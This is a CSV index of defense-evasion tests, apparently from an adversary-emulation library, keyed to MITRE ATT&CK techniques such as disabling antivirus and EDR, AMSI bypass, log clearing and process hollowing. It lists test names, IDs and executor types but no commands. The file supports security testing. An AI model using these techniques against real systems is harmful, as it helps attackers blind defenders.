defense-evasion,T1112,Modify Registry,56,Snake Malware Registry Blob,8318ad20-0488-4a64-98f4-72525a012f6b,powershell
defense-evasion,T1574.008,Hijack Execution Flow: Path Interception by Search Order Hijacking,1,powerShell Persistence via hijacking default modules - Get-Variable.exe,1561de08-0b4b-498e-8261-e922f3494aae,powershell
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,1,Pad Binary to Change Hash - Linux/macOS dd,ffe2346c-abd5-4b45-a713-bf5f1ebd573a,sh
defense-evasion,T1027.001,Obfuscated Files or Information: Binary Padding,2,Pad Binary to Change Hash using truncate command - Linux/macOS,e22a9e89-69c7-410f-a473-e6c212cd2292,sh
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,1,LockBit Black - Modify Group policy settings -cmd,9ab80952-74ee-43da-a98c-1e740a985f28,command_prompt
defense-evasion,T1484.001,Domain Policy Modification: Group Policy Modification,2,LockBit Black - Modify Group policy settings -Powershell,b51eae65-5441-4789-b8e8-64783c26c1d1,powershell
defense-evasion,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
defense-evasion,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
defense-evasion,T1078.001,Valid Accounts: Default Accounts,3,Enable Guest Account on macOS,0315bdff-4178-47e9-81e4-f31a6d23f7e4,command_prompt
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,1,Shared Library Injection via /etc/ld.so.preload,39cb0e67-dd0d-4b74-a74b-c072db7ae991,bash
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,2,Shared Library Injection via LD_PRELOAD,bc219ff7-789f-4d51-9142-ecae3397deae,bash
defense-evasion,T1574.006,Hijack Execution Flow: LD_PRELOAD,3,Dylib Injection via DYLD_INSERT_LIBRARIES,4d66029d-7355-43fd-93a4-b63ba92ea1be,bash
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,1,Clear Logs,e6abb60e-26b8-41da-8aae-0c35174b0967,command_prompt
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,2,Delete System Logs Using Clear-EventLog,b13e9306-3351-4b4b-a6e8-477358b0b498,powershell
defense-evasion,T1070.001,Indicator Removal on Host: Clear Windows Event Logs,3,Clear Event Logs via VBA,1b682d84-f075-4f93-9a89-8a8de19ffd6e,powershell
defense-evasion,T1134.002,Create Process with Token,1,Access Token Manipulation,dbf4f5a9-b8e0-46a3-9841-9ad71247239e,powershell
defense-evasion,T1134.002,Create Process with Token,2,WinPwn - Get SYSTEM shell - Pop System Shell using Token Manipulation technique,ccf4ac39-ec93-42be-9035-90e2f26bcd92,powershell
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,1,Make and modify binary from C source,896dfe97-ae43-4101-8e96-9a7996555d80,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,2,Set a SetUID flag on file,759055b3-3885-4582-a8ec-c00c9d64dd79,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,3,Set a SetGID flag on file,db55f666-7cba-46c6-9fe6-205a05c3242c,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,4,Make and modify capabilities of a binary,db53959c-207d-4000-9e7a-cd8eb417e072,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,5,Provide the SetUID capability to a file,1ac3272f-9bcf-443a-9888-4b1d3de785c1,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,6,Do reconnaissance for files that have the setuid bit set,8e36da01-cd29-45fd-be72-8a0fcaad4481,sh
defense-evasion,T1548.001,Abuse Elevation Control Mechanism: Setuid and Setgid,7,Do reconnaissance for files that have the setgid bit set,3fb46e17-f337-4c14-9f9a-a471946533e2,sh
defense-evasion,T1218.008,Signed Binary Proxy Execution: Odbcconf,1,Odbcconf.exe - Execute Arbitrary DLL,2430498b-06c0-4b92-a448-8ad263c388e2,command_prompt
defense-evasion,T1218.008,Signed Binary Proxy Execution: Odbcconf,2,Odbcconf.exe - Load Response File,331ce274-f9c9-440b-9f8c-a1006e1fce0b,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,1,Auditing Configuration Changes on Linux Host,212cfbcf-4770-4980-bc21-303e37abd0e3,bash
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,2,Logging Configuration Changes on Linux Host,7d40bc58-94c7-4fbb-88d9-ebce9fcdb60c,bash
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,3,Disable Powershell ETW Provider - Windows,6f118276-121d-4c09-bb58-a8fb4a72ee84,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,4,Disable .NET Event Tracing for Windows Via Registry (cmd),8a4c33be-a0d3-434a-bee6-315405edbd5b,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,5,Disable .NET Event Tracing for Windows Via Registry (powershell),19c07a45-452d-4620-90ed-4c34fffbe758,powershell
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,6,LockBit Black - Disable the ETW Provider of Windows Defender -cmd,f6df0b8e-2c83-44c7-ba5e-0fa4386bec41,command_prompt
defense-evasion,T1562.006,Impair Defenses: Indicator Blocking,7,LockBit Black - Disable the ETW Provider of Windows Defender -Powershell,69fc085b-5444-4879-8002-b24c8e1a3e02,powershell
defense-evasion,T1070,Indicator Removal on Host,1,Indicator Removal using FSUtil,b4115c7a-0e92-47f0-a61e-17e7218b2435,command_prompt
defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket,1,Mimikatz Kerberos Ticket Attack,dbf38128-7ba7-4776-bedf-cc2eed432098,command_prompt
defense-evasion,T1550.003,Use Alternate Authentication Material: Pass the Ticket,2,Rubeus Kerberos Pass The Ticket,a2fc4ec5-12c6-4fb4-b661-961f23f359cb,powershell
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,1,Creating W32Time similar named service using schtasks,f9f2fe59-96f7-4a7d-ba9f-a9783200d4c9,command_prompt
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,2,Creating W32Time similar named service using sc,b721c6ef-472c-4263-a0d9-37f1f4ecff66,command_prompt
defense-evasion,T1036.004,Masquerading: Masquerade Task or Service,3,linux rename /proc/pid/comm using prctl,f0e3aaea-5cd9-4db6-a077-631dd19b27a8,sh
defense-evasion,T1055.004,Process Injection: Asynchronous Procedure Call,1,Process Injection via C#,611b39b7-e243-4c81-87a4-7145a90358b1,command_prompt
defense-evasion,T1647,Plist File Modification,1,Plist Modification,394a538e-09bb-4a4a-95d1-b93cf12682a8,manual
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,1,Mount ISO image,002cca30-4778-4891-878a-aaffcfa502fa,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,2,Mount an ISO image and run executable from the ISO,42f22b00-0242-4afc-a61b-0da05041f9cc,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,3,Remove the Zone.Identifier alternate data stream,64b12afc-18b8-4d3f-9eab-7f6cae7c73f9,powershell
defense-evasion,T1553.005,Subvert Trust Controls: Mark-of-the-Web Bypass,4,Execute LNK file from ISO,c2587b8d-743d-4985-aa50-c83394eaeb68,powershell
defense-evasion,T1612,Build Image on Host,1,Build Image On Host,2db30061-589d-409b-b125-7b473944f9b3,sh
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,1,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,1483fab9-4f52-4217-a9ce-daa9d7747cae,command_prompt
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,2,Mshta executes VBScript to execute malicious command,906865c3-e05f-4acc-85c4-fbc185455095,command_prompt
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,3,Mshta Executes Remote HTML Application (HTA),c4b97eeb-5249-4455-a607-59f95485cb45,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,4,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,007e5672-2088-4853-a562-7490ddc19447,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,5,Invoke HTML Application - Jscript Engine Simulating Double Click,58a193ec-131b-404e-b1ca-b35cf0b18c33,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,6,Invoke HTML Application - Direct download from URI,39ceed55-f653-48ac-bd19-aceceaf525db,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,7,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,e7e3a525-7612-4d68-a5d3-c4649181b8af,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,8,Invoke HTML Application - JScript Engine with Inline Protocol Handler,d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,9,Invoke HTML Application - Simulate Lateral Movement over UNC Path,b8a8bdb2-7eae-490d-8251-d5e0295b2362,powershell
defense-evasion,T1218.005,Signed Binary Proxy Execution: Mshta,10,Mshta used to Execute PowerShell,8707a805-2b76-4f32-b1c0-14e558205772,command_prompt
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,1,Named pipe client impersonation,90db9e27-8e7c-4c04-b602-a45927884966,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,2,`SeDebugPrivilege` token duplication,34f0a430-9d04-4d98-bcb5-1989f14719f0,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,3,Launch NSudo Executable,7be1bc0f-d8e5-4345-9333-f5f67d742cb9,powershell
defense-evasion,T1134.001,Access Token Manipulation: Token Impersonation/Theft,4,Bad Potato,9c6d799b-c111-4749-a42f-ec2f8cb51448,powershell
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,1,Create Hidden User using UniqueID < 500,4238a7f0-a980-4fff-98a2-dfc0a363d507,sh
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,2,Create Hidden User using IsHidden option,de87ed7b-52c3-43fd-9554-730f695e7f31,sh
defense-evasion,T1564.002,Hide Artifacts: Hidden Users,3,Create Hidden User in Registry,173126b7-afe4-45eb-8680-fa9f6400431c,command_prompt
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,1,Disable history collection,4eafdb45-0f79-4d66-aa86-a3e2c08791f5,sh
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,2,Mac HISTCONTROL,468566d5-83e5-40c1-b338-511e1659628d,manual
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,3,Clear bash history,878794f7-c511-4199-a950-8c28b3ed8e5b,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,4,Setting the HISTCONTROL environment variable,10ab786a-028e-4465-96f6-9e83ca6c5f24,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,5,Setting the HISTFILESIZE environment variable,5cafd6c1-2f43-46eb-ac47-a5301ba0a618,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,6,Setting the HISTFILE environment variable,b3dacb6c-a9e3-44ec-bf87-38db60c5cad1,bash
defense-evasion,T1562.003,Impair Defenses: HISTCONTROL,7,Setting the HISTIGNORE environment variable,f12acddb-7502-4ce6-a146-5b62c59592f1,bash
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,1,Parent PID Spoofing using PowerShell,069258f4-2162-46e9-9a25-c9c6c56150d2,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,2,Parent PID Spoofing - Spawn from Current Process,14920ebd-1d61-491a-85e0-fe98efe37f25,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,3,Parent PID Spoofing - Spawn from Specified Process,cbbff285-9051-444a-9d17-c07cd2d230eb,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,4,Parent PID Spoofing - Spawn from svchost.exe,e9f2b777-3123-430b-805d-5cedc66ab591,powershell
defense-evasion,T1134.004,Access Token Manipulation: Parent PID Spoofing,5,Parent PID Spoofing - Spawn from New Process,2988133e-561c-4e42-a15f-6281e6a9b2db,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,1,Compiled HTML Help Local Payload,5cb87818-0d7c-4469-b7ef-9224107aebe8,command_prompt
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,2,Compiled HTML Help Remote Payload,0f8af516-9818-4172-922b-42986ef1e81d,command_prompt
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,3,Invoke CHM with default Shortcut Command Execution,29d6f0d7-be63-4482-8827-ea77126c1ef7,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,4,Invoke CHM with InfoTech Storage Protocol Handler,b4094750-5fc7-4e8e-af12-b4e36bf5e7f6,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,5,Invoke CHM Simulate Double click,5decef42-92b8-4a93-9eb2-877ddcb9401a,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,6,Invoke CHM with Script Engine and Help Topic,4f83adda-f5ec-406d-b318-9773c9ca92e5,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,7,Invoke CHM Shortcut Command with ITS and Help Topic,15756147-7470-4a83-87fb-bb5662526247,powershell
defense-evasion,T1218.001,Signed Binary Proxy Execution: Compiled HTML File,8,Decompile Local CHM File,20cb05e0-1fa5-406d-92c1-84da4ba01813,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,1,Add Network Share,14c38f32-6509-46d8-ab43-d53e32d2b131,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,2,Remove Network Share,09210ad5-1ef2-4077-9ad3-7351e13e9222,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,3,Remove Network Share PowerShell,0512d214-9512-4d22-bde7-f37e058259b3,powershell
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,4,Disable Administrative Share Creation at Startup,99c657aa-ebeb-4179-a665-69288fdd12b8,command_prompt
defense-evasion,T1070.005,Indicator Removal on Host: Network Share Connection Removal,5,Remove Administrative Shares,4299eff5-90f1-4446-b2f3-7f4f5cfd5d62,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,1,Disable syslog,4ce786f8-e601-44b5-bfae-9ebb15a7d1c8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,2,Disable Cb Response,ae8943f7-0f8d-44de-962d-fbc2e2f03eb8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,3,Disable SELinux,fc225f36-9279-4c39-b3f9-5141ab74f8d8,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,4,Stop Crowdstrike Falcon on Linux,828a1278-81cc-4802-96ab-188bf29ca77d,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,5,Disable Carbon Black Response,8fba7766-2d11-4b4a-979a-1e3d9cc9a88c,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,6,Disable LittleSnitch,62155dd8-bb3d-4f32-b31c-6532ff3ac6a3,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,7,Disable OpenDNS Umbrella,07f43b33-1e15-4e99-be70-bc094157c849,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,8,Disable macOS Gatekeeper,2a821573-fb3f-4e71-92c3-daac7432f053,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,9,Stop and unload Crowdstrike Falcon on macOS,b3e7510c-2d4c-4249-a33f-591a2bc83eef,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,10,Unload Sysmon Filter Driver,811b3e76-c41b-430c-ac0d-e2380bfaa164,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,11,Uninstall Sysmon,a316fb2e-5344-470d-91c1-23e15c374edc,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,12,AMSI Bypass - AMSI InitFailed,695eed40-e949-40e5-b306-b4031e4154bd,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,13,AMSI Bypass - Remove AMSI Provider Reg Key,13f09b91-c953-438e-845b-b585e51cac9b,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,14,Disable Arbitrary Security Windows Service,a1230893-56ac-4c81-b644-2108e982f8f5,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,15,Tamper with Windows Defender ATP PowerShell,6b8df440-51ec-4d53-bf83-899591c9b5d7,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,16,Tamper with Windows Defender Command Prompt,aa875ed4-8935-47e2-b2c5-6ec00ab220d2,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,17,Tamper with Windows Defender Registry,1b3e0146-a1e5-4c5c-89fb-1bb2ffe8fc45,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,18,Disable Microsoft Office Security Features,6f5fb61b-4e56-4a3d-a8c3-82e13686c6d7,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,19,Remove Windows Defender Definition Files,3d47daaa-2f56-43e0-94cc-caf5d8d52a68,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,20,Stop and Remove Arbitrary Security Windows Service,ae753dda-0f15-4af6-a168-b9ba16143143,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,21,Uninstall Crowdstrike Falcon on Windows,b32b1ccf-f7c1-49bc-9ddd-7d7466a7b297,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,22,Tamper with Windows Defender Evade Scanning -Folder,0b19f4ee-de90-4059-88cb-63c800c683ed,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,23,Tamper with Windows Defender Evade Scanning -Extension,315f4be6-2240-4552-b3e1-d1047f5eecea,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,24,Tamper with Windows Defender Evade Scanning -Process,a123ce6a-3916-45d6-ba9c-7d4081315c27,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,25,office-365-Disable-AntiPhishRule,b9bbae2c-2ba6-4cf3-b452-8e8f908696f3,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,26,Disable Windows Defender with DISM,871438ac-7d6e-432a-b27d-3e7db69faf58,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,27,Disable Defender Using NirSoft AdvancedRun,81ce22fd-9612-4154-918e-8a1f285d214d,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,28,Kill antimalware protected processes using Backstab,24a12b91-05a7-4deb-8d7f-035fa98591bc,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,29,WinPwn - Kill the event log services for stealth,7869d7a3-3a30-4d2c-a5d2-f1cd9c34ce66,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,30,Tamper with Windows Defender ATP using Aliases - PowerShell,c531aa6e-9c97-4b29-afee-9b7be6fc8a64,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,31,LockBit Black - Disable Privacy Settings Experience Using Registry -cmd,d6d22332-d07d-498f-aea0-6139ecb7850e,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,32,LockBit Black - Use Registry Editor to turn on automatic logon -cmd,9719d0e1-4fe0-4b2e-9a72-7ad3ee8ddc70,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,33,LockBit Black - Disable Privacy Settings Experience Using Registry -Powershell,d8c57eaa-497a-4a08-961e-bd5efd7c9374,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,34,Lockbit Black - Use Registry Editor to turn on automatic logon -Powershell,5e27f36d-5132-4537-b43b-413b0d5eec9a,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,35,Disable Windows Defender with PwSh Disable-WindowsOptionalFeature,f542ffd3-37b4-4528-837f-682874faa012,powershell
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,36,WMIC Tamper with Windows Defender Evade Scanning Folder,59d386fc-3a4b-41b8-850d-9e3eee24dfe4,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,37,Delete Windows Defender Scheduled Tasks,4b841aa1-0d05-4b32-bbe7-7564346e7c76,command_prompt
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,38,Clear History,23b88394-091b-4968-a42d-fb8076992443,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,39,Suspend History,94f6a1c9-aae7-46a4-9083-2bb1f5768ec4,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,40,Reboot Linux Host via Kernel System Request,6d6d3154-1a52-4d1a-9d51-92ab8148b32e,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,41,Clear Pagging Cache,f790927b-ea85-4a16-b7b2-7eb44176a510,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,42,Disable Memory Swap,e74e4c63-6fde-4ad2-9ee8-21c3a1733114,sh
defense-evasion,T1562.001,Impair Defenses: Disable or Modify Tools,43,Disable Hypervisor-Enforced Code Integrity (HVCI),70bd71e6-eba4-4e00-92f7-617911dbe020,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,1,Process Hollowing using PowerShell,562427b4-39ef-4e8c-af88-463a78e70b9c,powershell
defense-evasion,T1055.012,Process Injection: Process Hollowing,2,RunPE via VBA,3ad4a037-1598-4136-837c-4027e4fa319b,powershell
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script,f45df6be-2e1e-4136-a384-8f18ab3826fb,sh
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell,a50d5a97-2531-499e-a1de-5544c74432c6,powershell
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry,450e7218-7915-4be4-8b9b-464a49eafcec,powershell
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File,f8c8a909-5f29-49ac-9244-413936ce6d1f,command_prompt
defense-evasion,T1027,Obfuscated Files or Information,5,DLP Evasion via Sensitive Data in VBA Macro over email,129edb75-d7b8-42cd-a8ba-1f3db64ec4ad,powershell
defense-evasion,T1027,Obfuscated Files or Information,6,DLP Evasion via Sensitive Data in VBA Macro over HTTP,e2d85e66-cb66-4ed7-93b1-833fc56c9319,powershell
defense-evasion,T1027,Obfuscated Files or Information,7,Obfuscated Command in PowerShell,8b3f4ed6-077b-4bdd-891c-2d237f19410f,powershell
defense-evasion,T1027,Obfuscated Files or Information,8,Obfuscated Command Line using special Unicode characters,e68b945c-52d0-4dd9-a5e8-d173d70c448f,manual
defense-evasion,T1027,Obfuscated Files or Information,9,Snake Malware Encrypted crmlog file,7e47ee60-9dd1-4269-9c4f-97953b183268,powershell
defense-evasion,T1027,Obfuscated Files or Information,10,Execution from Compressed JScript File,fad04df1-5229-4185-b016-fb6010cd87ac,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,1,Register Portable Virtualbox,c59f246a-34f8-4e4d-9276-c295ef9ba0dd,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,2,Create and start VirtualBox virtual machine,88b81702-a1c0-49a9-95b2-2dd53d755767,command_prompt
defense-evasion,T1564.006,Run Virtual Instance,3,Create and start Hyper-V virtual machine,fb8d4d7e-f5a4-481c-8867-febf13f8b6d3,powershell
defense-evasion,T1134.005,Access Token Manipulation: SID-History Injection,1,Injection SID-History with mimikatz,6bef32e5-9456-4072-8f14-35566fb85401,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,1,Regsvr32 local COM scriptlet execution,449aa403-6aba-47ce-8a37-247d21ef0306,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,2,Regsvr32 remote COM scriptlet execution,c9d0c4ef-8a96-4794-a75b-3d3a5e6f2a36,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,3,Regsvr32 local DLL execution,08ffca73-9a3d-471a-aeb0-68b4aa3ab37b,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,4,Regsvr32 Registering Non DLL,1ae5ea1f-0a4e-4e54-b2f5-4ac328a7f421,command_prompt
defense-evasion,T1218.010,Signed Binary Proxy Execution: Regsvr32,5,Regsvr32 Silent DLL Install Call DllRegisterServer,9d71c492-ea2e-4c08-af16-c6994cdf029f,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,1,Masquerading as Windows LSASS process,5ba5a3d1-cf3c-4499-968a-a93155d1f717,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,2,Masquerading as Linux crond process.,a315bfff-7a98-403b-b442-2ea1b255e556,sh
defense-evasion,T1036.003,Masquerading: Rename System Utilities,3,Masquerading - cscript.exe running as notepad.exe,3a2a578b-0a01-46e4-92e3-62e2859b42f0,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,4,Masquerading - wscript.exe running as svchost.exe,24136435-c91a-4ede-9da1-8b284a1c1a23,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,5,Masquerading - powershell.exe running as taskhostw.exe,ac9d0fc3-8aa8-4ab5-b11f-682cd63b40aa,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,6,Masquerading - non-windows exe running as windows exe,bc15c13f-d121-4b1f-8c7d-28d95854d086,powershell
defense-evasion,T1036.003,Masquerading: Rename System Utilities,7,Masquerading - windows exe running as different windows exe,c3d24a39-2bfe-4c6a-b064-90cd73896cb0,powershell
defense-evasion,T1036.003,Masquerading: Rename System Utilities,8,Malicious process Masquerading as LSM.exe,83810c46-f45e-4485-9ab6-8ed0e9e6ed7f,command_prompt
defense-evasion,T1036.003,Masquerading: Rename System Utilities,9,File Extension Masquerading,c7fa0c3b-b57f-4cba-9118-863bf4e653fc,command_prompt
defense-evasion,T1574.009,Hijack Execution Flow: Path Interception by Unquoted Path,1,Execution of program.exe as service with unquoted service path,2770dea7-c50f-457b-84c4-c40a47460d9f,command_prompt
defense-evasion,T1218.009,Signed Binary Proxy Execution: Regsvcs/Regasm,1,Regasm Uninstall Method Call Test,71bfbfac-60b1-4fc0-ac8b-2cedbbdcb112,command_prompt
defense-evasion,T1218.009,Signed Binary Proxy Execution: Regsvcs/Regasm,2,Regsvcs Uninstall Method Call Test,fd3c1c6a-02d2-4b72-82d9-71c527abb126,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,1,Install root CA on CentOS/RHEL,9c096ec4-fd42-419d-a762-d64cc950627e,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,2,Install root CA on Debian/Ubuntu,53bcf8a0-1549-4b85-b919-010c56d724ff,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,3,Install root CA on macOS,cc4a0b8c-426f-40ff-9426-4e10e5bf4c49,sh
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,4,Install root CA on Windows,76f49d86-5eb1-461a-a032-a480f86652f1,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,5,Install root CA on Windows with certutil,5fdb1a7a-a93c-4fbe-aa29-ddd9ef94ed1f,powershell
defense-evasion,T1553.004,Subvert Trust Controls: Install Root Certificate,6,Add Root Certificate to CurrentUser Certificate Store,ca20a3f1-42b5-4e21-ad3f-1049199ec2e0,powershell
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,1,Compile After Delivery using csc.exe,ffcdbd6a-b0e8-487d-927a-09127fe9a206,command_prompt
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,2,Dynamic C# Compile,453614d8-3ba6-4147-acc0-7ec4b3e1faef,powershell
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,3,C compile,d0377aa6-850a-42b2-95f0-de558d80be57,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,4,CC compile,da97bb11-d6d0-4fc1-b445-e443d1346efe,bash
defense-evasion,T1027.004,Obfuscated Files or Information: Compile After Delivery,5,Go compile,78bd3fa7-773c-449e-a978-dc1f1500bc52,bash
defense-evasion,T1197,BITS Jobs,1,Bitsadmin Download (cmd),3c73d728-75fb-4180-a12f-6712864d7421,command_prompt
defense-evasion,T1197,BITS Jobs,2,Bitsadmin Download (PowerShell),f63b8bc4-07e5-4112-acba-56f646f3f0bc,powershell
defense-evasion,T1197,BITS Jobs,3,"Persist, Download, & Execute",62a06ec5-5754-47d2-bcfc-123d8314c6ae,command_prompt
defense-evasion,T1197,BITS Jobs,4,Bits download using desktopimgdownldr.exe (cmd),afb5e09e-e385-4dee-9a94-6ee60979d114,command_prompt
defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,1,MSBuild Bypass Using Inline Tasks (C#),58742c0f-cb01-44cd-a60b-fb26e8871c93,command_prompt
defense-evasion,T1127.001,Trusted Developer Utilities Proxy Execution: MSBuild,2,MSBuild Bypass Using Inline Tasks (VB),ab042179-c0c5-402f-9bc8-42741f5ce359,command_prompt
defense-evasion,T1562.008,Impair Defenses: Disable Cloud Logs,1,AWS - CloudTrail Changes,9c10dc6b-20bd-403a-8e67-50ef7d07ed4e,sh
